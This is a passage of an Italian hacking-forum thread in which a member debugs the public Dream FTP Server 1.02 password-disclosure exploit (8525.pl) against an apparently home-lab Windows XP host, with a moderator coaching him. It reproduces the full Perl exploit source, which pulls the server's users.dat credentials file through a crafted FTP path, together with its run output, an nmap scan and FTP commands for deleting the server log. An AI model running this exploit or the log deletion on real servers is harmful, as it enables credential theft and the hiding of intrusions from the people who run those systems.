Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: Problema con l'exsploit di Dream FTP

  1. #1
    Junior Member morfes's Avatar
    Join Date
    Mar 2010
    Posts
    29

    Post Problema con l'exsploit di Dream FTP

    Salve ho eseguito la procedura riportata sul video e sul pdf della sezione tutorial! ho configurato l'exsploit 8525.pl su milw0rm come da video,sostituendo "Program Files con "Programmi", ma l'exsploit non è andato a buon fine ecco il risultato:
    Code:
    perl 8525.pl Neo 192.168.1.101 21
            Dream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit
            ****************************************************************
            *      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *
            *           E-mail : Paradis_des_fous[at]hotmail.fr            *
            *          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *
            *               From : MoroccO Figuig/Oujda City               *
            ****************************************************************
    
    
    
    Please Wait ! Connecting To The Server ......
    
              ******************************
              *             Status         *
              ******************************
    Neo , AttaCking The Target : 192.168.1.101
    On The Port : 21 , Just To Get Users/Passwords File :d
    Exploiting .....>    |80
    Exploiting ..........|Done!
    
    
    
    
    ............File Contents Are Just Below...........
    Use of uninitialized value $Disclosure in concatenation (.) or string at 8525.pl line 90.
    
    .........................EOF.......................
    Done For Fun //Figuigian HaCker
    Some Womens Makes The World Special , Just By Being On it <3
    Oltre a questo ho notato se non configuri l'user di Dream FTP selezionando la casella allow delete, non mi permette di eliminare il file del log quando accedo da shell alla porta ftp, nonostante la seleziono non mi fa eliminare il log! ecco il risultato:
    Code:
    ftp> delete log20091208.txt
    450 Internal error deleting the file: "/programmi/bolintech/log/log20091208.txt".
    ftp>
    Ah dimenticavo la mia cartella dei "log" è log e non logs come dal video, ed uso la stessa versione di BolinTech Dream FTP 1.02, come mai non mi funziona l'exsploit e questa differenza di percorsi?

  2. #2
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    la cancellazione dei log è solo una dimostrazione di un eventuale danno, (altrimenti il log rimarrebbe anche da listner), quindi viene deletato come possibile danno non come cancellazione del passaggio dell' exploitation. la directory era stata creata per l' archiviazione dei log, anche perché non sono cancellabili quelli attualmente in creazione.

    per quanto riguarda il funzionamento dell' exploit è indubbio, l' unica cosa che mi viene da pensare è se hai creato degli utenti precedentemente all' exploitation.

    Se crei degli utenti puoi ottenere le credenziali degli stessi, altrimenti no.

    devi crearti degli utenti a cui dare accesso a determinate risorse, poi dopo l' exploitation ti verranno riportate dall' exploit le credenziali corrispondenti ad ogni risorsa.

  3. #3
    Junior Member morfes's Avatar
    Join Date
    Mar 2010
    Posts
    29

    Default

    Quote Originally Posted by brigante View Post
    la cancellazione dei log è solo una dimostrazione di un eventuale danno, (altrimenti il log rimarrebbe anche da listner), quindi viene deletato come possibile danno non come cancellazione del passaggio dell' exploitation. la directory era stata creata per l' archiviazione dei log, anche perché non sono cancellabili quelli attualmente in creazione.

    per quanto riguarda il funzionamento dell' exploit è indubbio, l' unica cosa che mi viene da pensare è se hai creato degli utenti precedentemente all' exploitation.

    Se crei degli utenti puoi ottenere le credenziali degli stessi, altrimenti no.

    devi crearti degli utenti a cui dare accesso a determinate risorse, poi dopo l' exploitation ti verranno riportate dall' exploit le credenziali corrispondenti ad ogni risorsa.
    io ho creato su Dream FTP l'user prima di avviare l'exploit, mettendo come user: Admin e password, come credenziali ho messo la risorsa C:\ e ho selezionato tutti gli allow presenti nell'user, devo dire che quando ho installato Dream FTP ho trovato un user Anonimo senza password che non si può eliminare, cmq l'ho disabilitato questo user! utilizzando solo il mio Admin, ma l'exploit non ha avuto successo lo stesso!

  4. #4
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    Quote Originally Posted by morfes View Post
    io ho creato su Dream FTP l'user prima di avviare l'exploit, mettendo come user: Admin e password, come credenziali ho messo la risorsa C:\ e ho selezionato tutti gli allow presenti nell'user, devo dire che quando ho installato Dream FTP ho trovato un user Anonimo senza password che non si può eliminare, cmq l'ho disabilitato questo user! utilizzando solo il mio Admin, ma l'exploit non ha avuto successo lo stesso!
    beh questo è strano, ma a questo punto possiamo seguire l' errore che ti dà l' output dell' exploit, quindi controlla che magari, in un copia/incolla per la modifica dell' exploit che hai dovuto fare, non è saltato qualche carattere, altrimenti pasta pure il codice che gli diamo un occhio

  5. #5
    Junior Member morfes's Avatar
    Join Date
    Mar 2010
    Posts
    29

    Default

    Quote Originally Posted by brigante View Post
    beh questo è strano, ma a questo punto possiamo seguire l' errore che ti dà l' output dell' exploit, quindi controlla che magari, in un copia/incolla per la modifica dell' exploit che hai dovuto fare, non è saltato qualche carattere, altrimenti pasta pure il codice che gli diamo un occhio

    provo a riaggiornare l'archivio di milw0rm, modificando nuovamente l'exploit 8525.pl, cmq l'errore dell' output dell'exploit già lo postato prima.

  6. #6
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    Quote Originally Posted by morfes View Post
    provo a riaggiornare l'archivio di milw0rm, modificando nuovamente l'exploit 8525.pl, cmq l'errore dell' output dell'exploit già lo postato prima.
    invece di aggiornare l' archivio di milw0rm aggiorna direttamente exploitdb tramite svn, basta dare un' occhio alla home di off-sec.

    da li fai un grep al file *.cvs e leggi l'exploit, correggilo con attenzione e prova a rilanciarlo.

    pasta il codice intendevo pastare l' exploit dopo la modifica, non l' errore.

  7. #7
    Junior Member morfes's Avatar
    Join Date
    Mar 2010
    Posts
    29

    Default

    Quote Originally Posted by brigante View Post
    invece di aggiornare l' archivio di milw0rm aggiorna direttamente exploitdb tramite svn, basta dare un' occhio alla home di off-sec.

    da li fai un grep al file *.cvs e leggi l'exploit, correggilo con attenzione e prova a rilanciarlo.

    pasta il codice intendevo pastare l' exploit dopo la modifica, non l' errore.
    Ho scaricato il nuovo exploit-db, ecco il codice dell'exploit dopo la modifica:

    Code:
    #!/usr/bin/perl -w
    #
    # This Bug Similar to others found By My Friend : Stack <= so special Thanx
    # So You Can Exploit Arbitrary File Disclosure From The Server <== You can use Stack's Exploit To do That
    # But This Exploit i will get Users & Passwords Of The applicatin From : users.dat : C:\Program Files\BolinTech\users.dat
    # In This Exploit I Used The Port 80 You can use any port you want 21
    #################################################################################################################################
    #23/04/2009 13:20:25  FTP Server started on port 80.
    #23/04/2009 13:25:43  [0000000002] Client connected from 127.0.0.1.
    #23/04/2009 13:25:43  [0000000002] 220- ****************************************
    #23/04/2009 13:25:43  [0000000002] 220-
    #23/04/2009 13:25:43  [0000000002] 220-      Welcome to Dream FTP Server
    #23/04/2009 13:25:43  [0000000002] 220-      Copyright 2002 - 2004
    #23/04/2009 13:25:43  [0000000002] 220-      BolinTech Inc.
    #23/04/2009 13:25:43  [0000000002] 220-
    #23/04/2009 13:25:43  [0000000002] 220- ****************************************
    #23/04/2009 13:25:43  [0000000002] 220-
    #23/04/2009 13:25:43  [0000000002] 220  
    #23/04/2009 13:25:43  [0000000002] USER anonymous
    #23/04/2009 13:25:43  [0000000002] 331 Password required for anonymous
    #23/04/2009 13:25:43  [0000000002] PASS **********
    #23/04/2009 13:25:43  [0000000002] 230 User successfully logged in.
    #23/04/2009 13:25:43  [0000000002] PWD
    #23/04/2009 13:25:43  [0000000002] 257 "/" is current directory.
    #23/04/2009 13:25:43  [0000000002] TYPE I
    #23/04/2009 13:25:43  [0000000002] 200 Type set to I
    #23/04/2009 13:25:43  [0000000002] CWD Program Files
    #23/04/2009 13:25:43  [0000000002] 250 "/Program Files" is current directory.
    #23/04/2009 13:25:43  [0000000002] CWD BolinTech
    #23/04/2009 13:25:43  [0000000002] 250 "/Program Files/BolinTech" is current directory.
    #23/04/2009 13:25:43  [0000000002] MDTM users.dat
    #23/04/2009 13:25:43  [0000000002] 502 Command not implemented - Try HELP.
    #23/04/2009 13:25:43  [0000000002] PASV
    #23/04/2009 13:25:43  [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145).
    #23/04/2009 13:25:43  [0000000002] RETR users.dat
    #23/04/2009 13:25:43  [0000000002] 150 Opening BINARY mode data connection for file transfer.
    #23/04/2009 13:25:43  [0000000002] 226 Transfer complete
    #23/04/2009 13:25:43  [0000000002] Client disconnected from 127.0.0.1.
    #################################################################################################################################
    # Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html
    # Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers
    #################################################################################################################################
    # welcome To : WwW.Ma-HaxOrZ.CoM/vb <== Is Online
    #################################################################################################################################
    # Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png
    #################################################################################################################################
    use LWP::Simple;
    use LWP::UserAgent;
    
    print "\tDream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit\n";
    
    print "\t****************************************************************\n";
    print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
    print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
    print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
    print "\t*               From : MoroccO Figuig/Oujda City               *\n";
    print "\t****************************************************************\n\n\n\n";
    
    if(@ARGV < 3)
    {
    &help; exit();
    }
    sub help()
    {
    print "[X] Usage : perl $0 HackerName IP Port \n";
    print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 \n";
    }
    ($HackerName, $TargetIP, $AttackedPort) = @ARGV;
    print("Please Wait ! Connecting To The Server ......\n\n");
    sleep(5);
    
    print("          ******************************\n");
    print("          *             Status         *\n");
    print("          ******************************\n");
    print("$HackerName , AttaCking The Target : $TargetIP \n");
    print("On The Port : $AttackedPort , Just To Get Users/Passwords File :d\n");
    $terget1="Programmi";
    $target2="BolinTech";
    $target3="users.dat";
    $slash="/";
    $TargetFile=$terget1.$slash.$target2.$slash.$target3;
    $temp="/" x 2;
    my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
    print("Exploiting .....>    |80\n");
    sleep(15);
    print("Exploiting ..........|Done!\n");
    sleep(5);
    $Disclosure=get $boom;
    print("\n\n\n\n............File Contents Are Just Below...........\n");
    print("$Disclosure \n");
    print(".........................EOF.......................\n");
    print("Done For Fun //Figuigian HaCker\n");
    print("Some Womens Makes The World Special , Just By Being On it <3\n");
    
    # milw0rm.com [2009-04-23]

  8. #8
    Junior Member morfes's Avatar
    Join Date
    Mar 2010
    Posts
    29

    Default

    Niente ho provato anche con il exploit-db, l' exploit 8525.pl non funziona lo stesso!

  9. #9
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    Quote Originally Posted by morfes View Post
    Niente ho provato anche con il exploit-db, l' exploit 8525.pl non funziona lo stesso!
    e ora usando il codice che hai pastato lancia l' exploit e pasta il comando e l' output.

    magari pasta anche la parte relativa al dreamftp nello scanning.

  10. #10
    Junior Member morfes's Avatar
    Join Date
    Mar 2010
    Posts
    29

    Default

    Quote Originally Posted by brigante View Post
    e ora usando il codice che hai pastato lancia l' exploit e pasta il comando e l' output.

    magari pasta anche la parte relativa al dreamftp nello scanning.
    Ho lanciato l'exploit 8525.pl del exploit-db e mi da lo stesso errore di milw0rm che ho postato sopra, cmq gli exploit sono uguali, in entrambi ho sostituito Programs Files con Programmi. Ti posto anche il risultato dello scanning di nmap:

    Code:
    [sudo] password for morfes:
    
    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-12-09 19:23 CET
    NSE: Loaded 30 scripts for scanning.
    Initiating ARP Ping Scan at 19:23
    Scanning 192.168.1.101 [1 port]
    Completed ARP Ping Scan at 19:23, 0.00s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 19:23
    Completed Parallel DNS resolution of 1 host. at 19:23, 0.05s elapsed
    Initiating SYN Stealth Scan at 19:23
    Scanning 192.168.1.101 [100 ports]
    Discovered open port 21/tcp on 192.168.1.101
    Discovered open port 445/tcp on 192.168.1.101
    Completed SYN Stealth Scan at 19:23, 4.64s elapsed (100 total ports)
    Initiating Service scan at 19:23
    Scanning 2 services on 192.168.1.101
    Completed Service scan at 19:23, 6.02s elapsed (2 services on 1 host)
    Initiating OS detection (try #1) against 192.168.1.101
    NSE: Script scanning 192.168.1.101.
    NSE: Starting runlevel 1 scan
    Initiating NSE at 19:23
    Completed NSE at 19:23, 7.02s elapsed
    NSE: Starting runlevel 2 scan
    Initiating NSE at 19:23
    Completed NSE at 19:24, 40.01s elapsed
    NSE: Script Scanning completed.
    Host 192.168.1.101 is up (0.0048s latency).
    Interesting ports on 192.168.1.101:
    Not shown: 97 filtered ports
    PORT    STATE  SERVICE      VERSION
    21/tcp  open   ftp          BolinTech Dream FTP Server
    139/tcp closed netbios-ssn
    445/tcp open   microsoft-ds Microsoft Windows XP microsoft-ds
    MAC Address: 00:0E:E8:F7:DC:9B (zioncom)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows XP SP2 or SP3
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=256 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows
    
    Host script results:
    |  smb-os-discovery: Windows XP
    |  LAN Manager: Windows 2000 LAN Manager
    |  Name: WORKGROUP\CASA
    |_ System time: 2009-12-09 19:19:53 UTC+1
    |_ nbstat: ERROR: Name query failed: TIMEOUT
    
    Read data files from: /usr/share/nmap
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 60.97 seconds
               Raw packets sent: 327 (16.112KB) | Rcvd: 19 (1176B)
    P.S. Il Dream FTP che ho installato è la versione trial, può essere questa la causa del non successo dell'exploit?

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •